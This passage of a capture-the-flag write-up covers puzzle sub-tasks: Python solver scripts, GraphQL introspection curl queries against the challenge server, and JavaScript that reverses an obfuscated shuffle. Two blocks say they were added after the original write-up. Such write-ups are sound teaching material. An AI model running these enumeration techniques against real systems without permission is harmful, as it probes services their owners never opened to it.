b4_name=x.group(1).capitalize()\n  b4_char=x.group(2).capitalize()\n  x = re.search(&#039;(&#x5B;a-zA-Z\\-]+) sits next to the bunny with a (&#x5B;a-zA-Z\\-]+) backpack.&#039;, pres&#x5B;14])\n  b1_name=x.group(1).capitalize()\n  b2_clr=x.group(2).capitalize()\n\n  # the name b3_name is not mentioned in the statements\n  names = 
&#x5B;&#039;Thumper&#039;,&#039;Angel&#039;,&#039;Snowball&#039;,&#039;Midnight&#039;,&#039;Bunny&#039;]\n  for name in names:\n    if (name not in b1_name+b2_name+b4_name+b5_name):\n      b3_name = name\n      break\n\n  # the sign b4_sign is not mentioned in the statements\n  signs = &#x5B;&#039;Taurus&#039;,&#039;Aquarius&#039;,&#039;Pisces&#039;,&#039;Virgo&#039;,&#039;Capricon&#039;]\n  for sign in signs:\n    if (sign not in b1_sign+b2_sign+b3_sign+b5_sign):\n      b4_sign = sign\n      break\n  sol = &#039;Name,&#039;+b1_name+&#039;,&#039;+b2_name+&#039;,&#039;+b3_name+&#039;,&#039;+b4_name+&#039;,&#039;+b5_name+&#039;,&#039;\n  sol += &#039;Color,&#039;+b1_clr+&#039;,&#039;+b2_clr+&#039;,&#039;+b3_clr+&#039;,&#039;+b4_clr+&#039;,&#039;+b5_clr+&#039;,&#039;\n  sol += &#039;Characteristic,&#039;+b1_char+&#039;,&#039;+b2_char+&#039;,&#039;+b3_char+&#039;,&#039;+b4_char+&#039;,&#039;+b5_char+&#039;,&#039;\n  sol += &#039;Starsign,&#039;+b1_sign+&#039;,&#039;+b2_sign+&#039;,&#039;+b3_sign+&#039;,&#039;+b4_sign+&#039;,&#039;+b5_sign+&#039;,&#039;\n  sol += &#039;Mask,&#039;+b1_pattern+&#039;,&#039;+b2_pattern+&#039;,&#039;+b3_pattern+&#039;,&#039;+b4_pattern+&#039;,&#039;+b5_pattern\n  resp = s.get(&#039;http:\/\/whale.hacking-lab.com:5337\/?solution=&#039;+sol).text\n  print(sol)\n  if (&#039;You solved it!&#039; in resp): return True\n  return False\n\nif (solveChallenge14(s, resp)): print(&#039;solved c14!&#039;)\nelse:\n  print(&#039;failure solving c14!&#039;)\n  quit()\n<\/pre><\/div>\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">Punkt.Hase<\/h3>\n<br\/>The next task is called <code>Punkt.Hase<\/code> and displays a GIF animation of a blinking dot:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_14.png\" width=\"700\"\/>\n<br\/>\n<br\/>I used the tool <code>convert<\/code> to extract all frames out of the animation. 
The animation contains exactly 112 frames, which matches <code>112 \/ 8 = 14<\/code> bytes. Accordingly each frame of the animation represents a single bit. If the dot is black, the bit is 1. If the dot is white, the bit is 0. The following script executes <code>convert<\/code> to extract all frames and then checks the color of each frame to create a bit stream, which is submitted as the code:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\ndef solveChallenge15(s, resp):\n  x = re.search(&#039;&lt;img alt=&quot;dontknow&quot; src=&quot;..\/..\/static\/img\/ch15\/challenges\/(.+)&quot; height=&quot;5&quot; width=&quot;5&quot;&gt;&#039;, resp)\n  imgName = x.group(1)\n  # download image\n  imgUrl = &#039;http:\/\/whale.hacking-lab.com:5337\/static\/img\/ch15\/challenges\/&#039;+imgName\n  imgDownload = s.get(imgUrl).content\n  f = open(&#039;c15\/img.gif&#039;, &#039;w&#039;)\n  f.write(imgDownload)\n  f.close()\n\n  subprocess.check_output(&#x5B;&#039;convert&#039;,&#039;-coalesce&#039;,&#039;c15\/img.gif&#039;,&#039;c15\/out%d.png&#039;])\n\n  r = &#039;&#039;\n  for i in range(112):\n    img = Image.open(&#039;c15\/out&#039;+str(i)+&#039;.png&#039;)\n    pix = img.load()\n    if (pix&#x5B;0,0] == 0): r+=&#039;0&#039;\n    else: r+=&#039;1&#039;\n\n  r = hex(int(r,2))&#x5B;2:-1]\n  resp = s.get(&#039;http:\/\/whale.hacking-lab.com:5337\/?code=&#039;+r.decode(&#039;hex&#039;)).text\n  if (&#039;You solved it!&#039; in resp): return True\n  return False\n\nif (solveChallenge15(s, resp)): print(&#039;solved c15!&#039;)\nelse:\n  print(&#039;failure solving c15!&#039;)\n  quit()\n<\/pre><\/div>\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">Pssst &#8230;<\/h3>\n<br\/>The next task requires us to fulfil a regular expression:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_15.png\" width=\"700\"\/>\n<br\/>\n<br\/>I did not automate this 
task, but solved a few variants manually and added the solutions to a script, which prompted me to enter the solution manually whenever an unknown regular expression was encountered:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\ndef solveChallenge16(s, resp):\n  x = re.search(&#039;&lt;pre&gt;He: (.+)&lt;br&gt;You: &lt;input class=&quot;form-control&quot; type=&quot;text&quot;&#039;, resp)\n  regex = x.group(1)\n  print(regex)\n  if (regex == &#039;(&#x5B;13])(&#x5B;37])\\\\2\\\\1&#039;): res = &#039;1312&#039;\n  elif (regex == &#039;(?&lt;!1337)\\d{3}&#039;): res = &#039;123&#039;\n  elif (regex == &#039;(&#x5B;1337])\\\\1&#039;): res = &#039;11&#039;\n  elif (regex == &#039;&#x5B;^13-37]{5}&#039;): res = &#039;44444&#039;\n  elif (regex == &#039;&#x5B;1337]&#039;): res = &#039;1&#039;\n  elif (regex == &#039;\\\\b1337\\\\b&#039;): res = &#039;1337&#039;\n  elif (regex == &#039;(?&lt;!13)37&#039;): res = &#039;37&#039;\n  elif (regex == &#039;(?=\\d+ 1337)\\d+&#039;): res = &#039;3 13377&#039;\n  elif (regex == &#039;&lt;&#x5B;^1337]+&gt;&#039;): res = &#039;&lt;d&gt;&#039;\n  elif (regex == &#039;13(?!37)&#039;): res = &#039;1356&#039;\n  else:\n    res = raw_input(&#039;&gt;&#039;)\n  resp = s.get(&#039;http:\/\/whale.hacking-lab.com:5337\/?answer=&#039;+res).text\n  if (&#039;You solved it!&#039; in resp): return True\n  return False\n\nwhile (not solveChallenge16(s, resp)): print(&#039;failure solving c16!&#039;)\nprint(&#039;solved c16!&#039;)\n\n<\/pre><\/div>\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">The Oracle<\/h3>\n<br\/>The next task contains a quite useful hint on what needs to be done:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_16.png\" width=\"700\"\/>\n<br\/>\n<br\/>Thus we simply have to follow the instructions of the hint, set the <code>random.seed<\/code> 1337 times and then calculate the random 
number:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\ndef solveChallenge17(s, resp):\n  print(resp)\n  x = re.search(&#039;&lt;code&gt;(&#x5B;0-9-]+)&lt;\/code&gt;&#039;, resp)\n  x = int(x.group(1))\n  for i in range(1337):\n    random.seed(x)\n    x = random.randint(-(1337**42), 1337**42)\n\n  resp = s.get(&#039;http:\/\/whale.hacking-lab.com:5337\/?guess=&#039;+str(x)).text\n  if (&#039;You solved it!&#039; in resp): return True\n  return False\n\nif (solveChallenge17(s, resp)): print(&#039;solved c17!&#039;)\nelse:\n  print(&#039;failure solving c17!&#039;)\n  quit()\n\n<\/pre><\/div>\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">CLC32<\/h3>\n<br\/>The following task was amazingly confusing in my opinion:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_17.png\" width=\"700\"\/>\n<br\/>\n<br\/>The name of the task (<code>CLC32 ~= CRC32<\/code>) and the name of the input field (<code>checksum<\/code>) suggest that we have to find some kind of checksum.\n<br\/>\n<br\/>The first button is linked to the route <code>http:\/\/whale.hacking-lab.com:5337\/live\/a\/life<\/code>. 
The second one (obviously resetting something) is linked to <code>http:\/\/whale.hacking-lab.com:5337\/?new=life<\/code>.\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_18.png\" width=\"700\"\/>\n<br\/>\n<br\/>After a bit of research, I figured out that this is an interface to a <a href=\"https:\/\/en.wikipedia.org\/wiki\/GraphQL\" target=\"_new\" rel=\"noopener noreferrer\">GraphQL API<\/a>.\n<br\/>\n<br\/>The schema can be enumerated using <a href=\"https:\/\/graphql.org\/learn\/introspection\/\" target=\"_new\" rel=\"noopener noreferrer\">introspection<\/a>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg21# curl -g &#039;http:\/\/whale.hacking-lab.com:5337\/live\/a\/life?query={__schema{types{name}}}&#039;\n{&quot;data&quot;:{&quot;__schema&quot;:{&quot;types&quot;:&#x5B;{&quot;name&quot;:&quot;Query&quot;},{&quot;name&quot;:&quot;In&quot;},{&quot;name&quot;:&quot;Out&quot;},{&quot;name&quot;:&quot;String&quot;},{&quot;name&quot;:&quot;__Schema&quot;},{&quot;name&quot;:&quot;__Type&quot;},{&quot;name&quot;:&quot;__TypeKind&quot;},{&quot;name&quot;:&quot;Boolean&quot;},{&quot;name&quot;:&quot;__Field&quot;},{&quot;name&quot;:&quot;__InputValue&quot;},{&quot;name&quot;:&quot;__EnumValue&quot;},{&quot;name&quot;:&quot;__Directive&quot;},{&quot;name&quot;:&quot;__DirectiveLocation&quot;}]}}}\n\n<\/pre><\/div>\n<br\/>\n<br\/>The only custom types are <code>In<\/code> and <code>Out<\/code>; everything else is the <code>Query<\/code> root type, a built-in scalar or one of the <code>__<\/code>-prefixed introspection types. 
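The steps done by hand in this section (picking the custom types out of the `__schema` listing, sending a `__type` query per custom type, and building the nested data query from the field lists) can be scripted. The following is an added example, not code from the original writeup: the type list and the `In`/`Out` field lists are constructed from the introspection responses shown in this section, the endpoint path is the one from the curl commands, and nothing is sent over the network.

```python
import json
from urllib.parse import quote

# Constructed from the introspection responses quoted in this section: the
# {__schema{types{name}}} listing and the two __type queries for In and Out.
SCHEMA_RESPONSE = json.loads(
    '{"data":{"__schema":{"types":[{"name":"Query"},{"name":"In"},{"name":"Out"},'
    '{"name":"String"},{"name":"__Schema"},{"name":"__Type"},{"name":"__TypeKind"},'
    '{"name":"Boolean"},{"name":"__Field"},{"name":"__InputValue"},'
    '{"name":"__EnumValue"},{"name":"__Directive"},{"name":"__DirectiveLocation"}]}}}'
)
SENSES = ["see", "hear", "taste", "smell", "touch"]
TYPE_DEFS = {
    "In": {"fields": [{"name": "Out", "type": {"name": "Out", "kind": "OBJECT"}}]
          + [{"name": s, "type": {"name": "String", "kind": "SCALAR"}} for s in SENSES]},
    "Out": {"fields": [{"name": "In", "type": {"name": "In", "kind": "OBJECT"}}]
           + [{"name": s, "type": {"name": "String", "kind": "SCALAR"}} for s in SENSES]},
}

BUILTIN_SCALARS = {"String", "Boolean", "Int", "Float", "ID"}
ROOT_TYPES = {"Query", "Mutation", "Subscription"}


def custom_types(schema_response):
    """Type names that are neither __ introspection types, built-in scalars nor
    operation roots: the application's own types (In and Out here)."""
    names = [t["name"] for t in schema_response["data"]["__schema"]["types"]]
    return [n for n in names
            if not n.startswith("__") and n not in BUILTIN_SCALARS and n not in ROOT_TYPES]


def type_query(type_name):
    """The follow-up __type query that the curl commands in this section send."""
    return '{__type(name: "%s"){name fields{name type{name kind}}}}' % type_name


def selection_set(type_defs, type_name, depth):
    """Scalar fields first, then object fields expanded recursively.  The depth
    bound is essential here: In has a field Out and Out has a field In, so an
    unbounded expansion would never terminate."""
    fields = type_defs[type_name]["fields"]
    parts = [f["name"] for f in fields if f["type"]["kind"] == "SCALAR"]
    if depth > 1:
        for f in fields:
            if f["type"]["kind"] == "OBJECT":
                inner = selection_set(type_defs, f["type"]["name"], depth - 1)
                parts.append(f["name"] + "{" + inner + "}")
    return " ".join(parts)


def data_query(type_defs, root_field, type_name, depth=2):
    """Complete query for a root field whose result has the given type."""
    return "{" + root_field + "{" + selection_set(type_defs, type_name, depth) + "}}"


def query_url(endpoint, query):
    """Percent-encode the query for the ?query= parameter (curl -g passes it raw)."""
    return endpoint + "?query=" + quote(query, safe="")


if __name__ == "__main__":
    # endpoint path taken from the curl commands above; nothing is actually requested
    endpoint = "http://whale.hacking-lab.com:5337/live/a/life"
    for name in custom_types(SCHEMA_RESPONSE):
        print(query_url(endpoint, type_query(name)))
    print(data_query(TYPE_DEFS, "In", "In"))
```

With depth 2 the last line yields exactly the query used further down in this section, `{In{see hear taste smell touch Out{see hear taste smell touch}}}`.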
So let&#8217;s further inspect those types:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg21# curl -g &#039;http:\/\/whale.hacking-lab.com:5337\/live\/a\/life?query={__type(name:%20%22In%22){name%20fields{name%20type{name%20kind}}}}&#039;\n{&quot;data&quot;:{&quot;__type&quot;:{&quot;name&quot;:&quot;In&quot;,&quot;fields&quot;:&#x5B;{&quot;name&quot;:&quot;Out&quot;,&quot;type&quot;:{&quot;name&quot;:&quot;Out&quot;,&quot;kind&quot;:&quot;OBJECT&quot;}},{&quot;name&quot;:&quot;see&quot;,&quot;type&quot;:{&quot;name&quot;:&quot;String&quot;,&quot;kind&quot;:&quot;SCALAR&quot;}},{&quot;name&quot;:&quot;hear&quot;,&quot;type&quot;:{&quot;name&quot;:&quot;String&quot;,&quot;kind&quot;:&quot;SCALAR&quot;}},{&quot;name&quot;:&quot;taste&quot;,&quot;type&quot;:{&quot;name&quot;:&quot;String&quot;,&quot;kind&quot;:&quot;SCALAR&quot;}},{&quot;name&quot;:&quot;smell&quot;,&quot;type&quot;:{&quot;name&quot;:&quot;String&quot;,&quot;kind&quot;:&quot;SCALAR&quot;}},{&quot;name&quot;:&quot;touch&quot;,&quot;type&quot;:{&quot;name&quot;:&quot;String&quot;,&quot;kind&quot;:&quot;SCALAR&quot;}}]}}}\n<\/pre><\/div>\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg21# curl -g 
&#039;http:\/\/whale.hacking-lab.com:5337\/live\/a\/life?query={__type(name:%20%22Out%22){name%20fields{name%20type{name%20kind}}}}&#039;\n{&quot;data&quot;:{&quot;__type&quot;:{&quot;name&quot;:&quot;Out&quot;,&quot;fields&quot;:&#x5B;{&quot;name&quot;:&quot;In&quot;,&quot;type&quot;:{&quot;name&quot;:&quot;In&quot;,&quot;kind&quot;:&quot;OBJECT&quot;}},{&quot;name&quot;:&quot;see&quot;,&quot;type&quot;:{&quot;name&quot;:&quot;String&quot;,&quot;kind&quot;:&quot;SCALAR&quot;}},{&quot;name&quot;:&quot;hear&quot;,&quot;type&quot;:{&quot;name&quot;:&quot;String&quot;,&quot;kind&quot;:&quot;SCALAR&quot;}},{&quot;name&quot;:&quot;taste&quot;,&quot;type&quot;:{&quot;name&quot;:&quot;String&quot;,&quot;kind&quot;:&quot;SCALAR&quot;}},{&quot;name&quot;:&quot;smell&quot;,&quot;type&quot;:{&quot;name&quot;:&quot;String&quot;,&quot;kind&quot;:&quot;SCALAR&quot;}},{&quot;name&quot;:&quot;touch&quot;,&quot;type&quot;:{&quot;name&quot;:&quot;String&quot;,&quot;kind&quot;:&quot;SCALAR&quot;}}]}}}\n<\/pre><\/div>\n<br\/>\n<br\/>Accordingly both types have the following attributes:\n<br\/><ul style=\"margin-top:8px;margin-bottom:-15px\"><li>see<\/li><li>hear<\/li><li>taste<\/li><li>smell<\/li><li>touch<\/li><li>In\/Out<\/li><\/ul>\n<br\/>\n<br\/>When querying a concrete value, we can see that there seems to be a server-side counter:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg21# curl -g &#039;http:\/\/whale.hacking-lab.com:5337\/live\/a\/life?query={In{see%20hear%20taste%20smell%20touch%20Out{see%20hear%20taste%20smell%20touch}}}&#039;\n{&quot;errors&quot;:&#x5B;{&quot;message&quot;:&quot;&#039;c18&#039; object has no attribute &#039;counter&#039;&quot;,&quot;locations&quot;:&#x5B;{&quot;line&quot;:1,&quot;column&quot;:2}],&quot;path&quot;:&#x5B;&quot;In&quot;]}],&quot;data&quot;:{&quot;In&quot;:null}}\n<\/pre><\/div>\n<br\/>\n<br\/>Thus we need to supply a 
session cookie:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg21# curl -g &#039;http:\/\/whale.hacking-lab.com:5337\/live\/a\/life?query={In{see%20hear%20taste%20smell%20touch%20Out{see%20hear%20taste%20smell%20touch}}}&#039; --cookie &#039;session=z.TocvCpnRrUIk9CdyjZ+2reqAyMlHSYY4woQ\/Cz6C05pjqKbGobF993p8pny1tmM9jdh8jV9IkF...&#039;\n{&quot;data&quot;:{&quot;In&quot;:{&quot;see&quot;:&quot;p&quot;,&quot;hear&quot;:&quot;X&quot;,&quot;taste&quot;:&quot;M&quot;,&quot;smell&quot;:&quot;H&quot;,&quot;touch&quot;:&quot;3&quot;,&quot;Out&quot;:{&quot;see&quot;:&quot;r&quot;,&quot;hear&quot;:&quot;s&quot;,&quot;taste&quot;:&quot;G&quot;,&quot;smell&quot;:&quot;K&quot;,&quot;touch&quot;:&quot;k&quot;}}}}\n<\/pre><\/div>\n<br\/>\n<br\/>After a few hours of trying to read a meaning into this, I figured out that it suffices to repeat the above request and write down all letters which appear on more than 3 sins (see hint).\n<br\/>\n<br\/>The concatenation of those letters is the checksum to be submitted. Quite a lot of guessing was involved here.\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">Bunny-Teams<\/h3>\n<br\/>The second-to-last task requires us to solve a little game:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_19.png\" width=\"700\"\/>\n<br\/>\n<br\/>I did not automate this task, but solved it manually. 
Here is my solution for the given setup:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_20.png\" width=\"700\"\/>\n<br\/>\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">Opa &#038; CCrypto &#8211; Museum<\/h3>\n<br\/>After having solved all previous tasks, the <code>Opa &amp; CCrypto - Museum<\/code> appears on the map (see picture above for the location):\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_11.png\" width=\"700\"\/>\n<br\/>\n<br\/>The page source contains the following JavaScript (everything after the box of carrots is commented out):\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: jscript; gutter: false; title: ; notranslate\" title=\"\">\n&quot;use strict&quot;;\n\nlet theBoxOfCarrots = &#x5B;\n  &#x5B;91968, &quot;16.8.8.10.12.14.15.8.8.9.10.8.9.12.1 ... a lot of values following ...],\n  &#x5B;92109, &quot;14.7.7.7.4.5.5.5.5.8.6.9.11.10.12.1 ... a lot of values following ...], ...];\n\n\/*\nlet a = &#x5B;&#039;abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789&#039;];\nlet c = 0;\nlet f = false;\nlet n = 0;\nlet s = 1;\nlet alive = true;\nlet age = 0;\nlet destiny = 7331;\nlet note = &#039;Whoever finds this may continue to tell our stories or may reveal the secret that is hidden behind all of them. 
gz opa &amp; ccrypto&#039;\n\nfunction heOpened(a) {\n    return a;\n}\n\nObject.prototype.and = function and() {\n    if (s % 1 === 0) console.log(&#039;just&#039;);\n    if (s % 3 === 0) console.log(&#039;a&#039;);\n    if (s % 13 === 0) console.log(&#039;lie&#039;);\n    if (s % 37 === 0) console.log(&#039;?&#039;);\n    return this;\n};\n\nObject.prototype.then = function then() {\n    s += 1;\n    return this;\n};\n\nObject.prototype.heClosed = function heClosed() {\n    this.sort((a, b) =&gt; {\n        return a&#x5B;0] - b&#x5B;0]\n    });\n    return this;\n};\n\nObject.prototype.heShuffled = function heShuffled(what) {\n    if (what === &#039;everything&#039;) {\n        this.forEach((o, i) =&gt; {\n            s = o&#x5B;0] + Math.abs(Math.floor(Math.sin(s) * 20));\n            this&#x5B;i]&#x5B;0] = s;\n        });\n\n        this.forEach((o, i) =&gt; {\n            this&#x5B;i]&#x5B;1] += (i + &quot;.&quot;);\n        });\n    }\n\n    return this\n};\n\nObject.prototype.but = function but() {\n    s = s;\n    return this\n};\n\nObject.prototype.sometimes = function sometimes() {\n    if (s % 133713371337 === 0) f = true;\n    return this\n};\n\n\nObject.prototype.heForgot = function heForgot() {\n    if (f) s = Math.abs(Math.floor(Math.sin(s) * parseInt(13.37)));\n    f = false;\n    return this\n};\n\nObject.prototype.heSaid = function heSaid(w) {\n    let magic = 0;\n    w.forEach((y) =&gt; {\n        if (y === &#039;ca&#039;) {\n            magic += 3;\n        }\n        if (y === &#039;da&#039;) {\n            magic -= 1;\n        }\n        if (y === &#039;bra&#039;) {\n            magic \/= 2;\n        }\n    });\n    s -= magic;\n    return this;\n};\n\nObject.prototype.heDidThat = function heDidThat(a) {\n    if (a === &#039;for a very long time.&#039;) {\n        theBoxOfCarrots = this;\n        age += 1;\n        if (age &gt; destiny) {\n            alive = false;\n        }\n    }\n};\n\n\nObject.prototype.heRolled = function heRolled(a) 
{\n    if (a === &#039;a really large dice&#039;) {\n        n = Math.abs(Math.floor(Math.sin(s) * 1337));\n    }\n    return this\n};\n\n\nlet tell_a_story = () =&gt; {\n    while (alive) {\n        heOpened(theBoxOfCarrots)\n            .and().then().heRolled(&#039;a really large dice&#039;)\n            .and().then().heSaid(&#x5B;&#039;a&#039;, &#039;bra&#039;, &#039;ca&#039;, &#039;da&#039;, &#039;bra&#039;])\n            .but().sometimes().heForgot()\n            .and().then().heShuffled(&#039;everything&#039;)\n            .and().then().heClosed(theBoxOfCarrots)\n            .and().heDidThat(&#039;for a very long time.&#039;);\n    }\n};\n\ntell_a_story();\n*\/\n<\/pre><\/div>\n<br\/>\n<br\/>Analyzing the code revealed that a lot of steps are superfluous. I started by minimizing the code to the necessary steps:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: jscript; title: ; notranslate\" title=\"\">\nlet s = 0;\nvar theBox = &#x5B;&#x5B;91968, &quot;16.8.8.10.12.14. ... original theBoxOfCarrots here ...&quot;], ...];\n\nfunction tell_a_story_minimized() {\n  for (var age = 0; age &lt;= 7331; age++) {\n    s+=3;\n    theBox.forEach((o, i) =&gt; {\n      s = o&#x5B;0] + Math.abs(Math.floor(Math.sin(s) * 20));\n      theBox&#x5B;i]&#x5B;0] = s;\n      theBox&#x5B;i]&#x5B;1] += (i + &quot;.&quot;);\n    });\n    theBox = theBox.sort((a, b) =&gt; {return a&#x5B;0] - b&#x5B;0]});\n  }\n}\n<\/pre><\/div>\n<br\/>\n<br\/>Now we can write some javascript code, which reverts the steps done from the original script and thus reveals the secret:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: jscript; title: ; notranslate\" title=\"\">\nlet s = 0;\nvar theBox = &#x5B;&#x5B;91968, &quot;16.8.8.10.12.14. ... 
original theBoxOfCarrots here ...&quot;], ...];\n\nfunction uncoverSecret() {\n  \/\/ strip the trailing &quot;.&quot; so that split(&#039;.&#039;) yields exactly the appended indices\n  for (let i = 0; i &lt; 20; i++) theBox&#x5B;i]&#x5B;1] = theBox&#x5B;i]&#x5B;1].substr(0, theBox&#x5B;i]&#x5B;1].length - 1);\n  for (let x = 0; x &lt;= 7331; x++) theBox = rev(theBox);\n  let result = &#x5B;];\n  for (let i = 0; i &lt; 20; i++) result.push(theBox&#x5B;i]&#x5B;0]);\n  console.log(result);\n}\n\nfunction rev(tB) {\n  \/\/ undo the sort: the index appended last is the position of the carrot before sorting\n  let theNewBox = &#x5B;];\n  for (let i = 0; i &lt; 20; i++) theNewBox.push(&#x5B;]);\n  for (let i = 0; i &lt; 20; i++) {\n    let idxArray = tB&#x5B;i]&#x5B;1].split(&#039;.&#039;);\n    let oldIdx = idxArray.pop();\n    theNewBox&#x5B;oldIdx] = tB&#x5B;i];\n    theNewBox&#x5B;oldIdx]&#x5B;1] = idxArray.join(&#039;.&#039;);\n  }\n  \/\/ undo the additions back to front: the s used for carrot i was the new value of carrot i-1\n  for (let i = 19; i &gt; 0; i--) {\n    theNewBox&#x5B;i]&#x5B;0] = theNewBox&#x5B;i]&#x5B;0] - Math.abs(Math.floor(Math.sin(theNewBox&#x5B;i-1]&#x5B;0]) * 20));\n  }\n  \/\/ carrot 0 used the s left over from the previous round (the value of the carrot that sat at index 19 then) plus 3\n  let old_s = 0;\n  for (let i = 0; i &lt; 20; i++) {\n    if (theNewBox&#x5B;i]&#x5B;1].length &gt; 0) {\n      let idxArrayTmp = theNewBox&#x5B;i]&#x5B;1].split(&#039;.&#039;);\n      let oldIdxTmp = idxArrayTmp&#x5B;idxArrayTmp.length-1];\n      if (oldIdxTmp == 19) old_s = theNewBox&#x5B;i]&#x5B;0];\n    }\n  }\n  theNewBox&#x5B;0]&#x5B;0] = theNewBox&#x5B;0]&#x5B;0] - Math.abs(Math.floor(Math.sin(old_s + 3) * 20));\n\n  return theNewBox;\n}\n<\/pre><\/div>\n<br\/>\n<br\/>Running the function <code>uncoverSecret<\/code> takes a while, but finally outputs the original values stored in <code>theBoxOfCarrots<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_21.png\" width=\"500\"\/>\n<br\/>\n<br\/>Ok, but what is the flag? 
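The reversal works because every round appends a carrot's pre-sort index to its string, so the sort can be undone and the additions can then be peeled off back to front. The following Python roundtrip is an added example, not code from the writeup or the challenge (Python rather than JavaScript, to match the other scripts here): it reimplements the minimized loop on a small constructed box, undoes it the same way `rev` does, and additionally handles the case where the carrot that was last in the previous round lands at index 0 (there `rev` reads that carrot's value before it has been reverted); the alphabet lookup at the end is how the recovered numbers are used.

```python
import math

SCALE = 20   # Math.sin(s) * 20 in the challenge script
STEP = 3     # net change of s per round from the chained and()/then()/heSaid() calls


def delta(s):
    """The increment the script adds to each carrot: abs(floor(sin(s) * 20))."""
    return abs(math.floor(math.sin(s) * SCALE))


def shuffle_round(box, s):
    """One round of the minimized tell_a_story loop; entries are [value, trail]."""
    s += STEP
    for i, entry in enumerate(box):
        s = entry[0] + delta(s)
        entry[0] = s
        entry[1] += str(i) + "."      # remember the position before sorting
    box.sort(key=lambda e: e[0])
    return s                          # s keeps the value computed for the last carrot


def shuffle(box, rounds):
    box = [[v, t] for v, t in box]    # work on a copy
    s = 0
    for _ in range(rounds):
        s = shuffle_round(box, s)
    return box


def prev_index(trail):
    """Pre-sort index recorded by the most recent round, or None for an empty trail."""
    return int(trail[:-1].split(".")[-1]) if trail else None


def unshuffle_round(box):
    n = len(box)
    new_box = [None] * n
    # 1. undo the sort: put every carrot back at the index recorded last
    for value, trail in box:
        idx = prev_index(trail)
        if idx is None:
            raise ValueError("trail exhausted: more rounds reverted than were applied")
        parts = trail[:-1].split(".")[:-1]
        new_box[idx] = [value, ".".join(parts) + ("." if parts else "")]
    # 2. undo the additions back to front: carrot i used the new value of carrot i-1 as s
    for i in range(n - 1, 0, -1):
        new_box[i][0] -= delta(new_box[i - 1][0])
    # 3. carrot 0 used s from the previous round plus STEP; that s is the value the
    #    previous round left in the carrot that sat at index n-1 then, i.e. whose
    #    trail (after the pop above) now ends with n-1
    last = [i for i in range(n) if prev_index(new_box[i][1]) == n - 1]
    if not last:                              # first round: s started at 0
        new_box[0][0] -= delta(0 + STEP)
    elif last[0] != 0:                        # already reverted in step 2
        new_box[0][0] -= delta(new_box[last[0]][0] + STEP)
    else:                                     # carrot 0 is its own predecessor:
        v0 = new_box[0][0]                    # solve v0 = x + delta(x + STEP); if several x fit,
        new_box[0][0] = next(x for x in range(v0 - SCALE, v0 + 1)   # the round is ambiguous
                             if x + delta(x + STEP) == v0)           # and the smallest is taken
    return new_box


def unshuffle(box, rounds):
    box = [[v, t] for v, t in box]
    for _ in range(rounds):
        box = unshuffle_round(box)
    return box


def to_chars(values, alphabet):
    """The recovered numbers are indices into the alphabet string."""
    return "".join(alphabet[v] for v in values)


if __name__ == "__main__":
    secret = [[3000, ""], [1000, ""], [5000, ""], [2000, ""], [4000, ""]]   # constructed sample
    shuffled = shuffle(secret, 40)
    print(shuffled)
    print(unshuffle(shuffled, 40) == secret)
```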
